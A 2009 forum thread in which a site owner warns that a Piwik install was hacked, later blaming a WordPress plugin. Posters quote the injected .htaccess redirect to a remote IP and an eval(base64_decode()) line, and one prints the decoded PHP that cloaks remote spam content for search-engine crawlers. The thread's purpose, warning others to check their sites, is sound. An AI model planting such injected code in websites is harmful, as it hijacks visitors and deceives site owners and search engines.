
To anyone using piwik 0.4.5; seems it's hackable

Discussion in 'Black Hat SEO Tools' started by MuonTrail, Nov 23, 2009.

  1. MuonTrail

    Just noticed today that my piwik install got hacked. Not exactly sure how yet, but this is what it looks like he did.

    This was added to my htaccess

    Code:
    RewriteRule .* http://91.207.4.19/tds/go.php?sid=1 [R,L]
    And this lovely snippet was added to my index.php

    Code:
    eval(base64_decode("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"));
    I haven't really dug into this yet. Just wanted to give a quick heads up to anyone who might be using piwik to check their installs.
     
  2. Alex Brooks

    How do you know that this was a fault of Piwiks?
     
  3. sonneti

    I know f'all about PHP, but I'd guess it is redirecting your search engine traffic?

    Code:
    // Only fires when the visitor's User-Agent looks like a search engine crawler
    if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or stripos($_SERVER['HTTP_USER_AGENT'], 'live'))
    {
      $r = '';
      // Fetches content from the remote server, passing this site's hostname and the crawler's UA
      if($f=@fsockopen('91.207.4.18',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n"))
      while( $l = fread($f, 1024)) $r .= $l;
      @fclose($f);
      // Strips the HTTP response headers and echoes the body into the page
      $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
    }
    
     
  4. MuonTrail

    Well, I'm not sure it was piwik anymore. I finally had time to start digging into it and he got all my websites on that host. The most likely suspect is one of my wordpress installs. Probably a bad plugin. Meh.

    I was thinking search engine spider traffic... after all, traffic I get from the search engines shouldn't show the name of the search engine in the user-agent, would it? I don't think so.

    The code he base64'd just returned (at the time) an empty hidden div, which would have been added at the end of my pages. Though I can't imagine what he would possibly want to do with spider traffic. And I still haven't figured out what he exploited. Meh.

    So it was a false alarm for piwik. But if you use a crap-load of plugins on your wordpress sites you might want to do periodic checks. :rolleyes: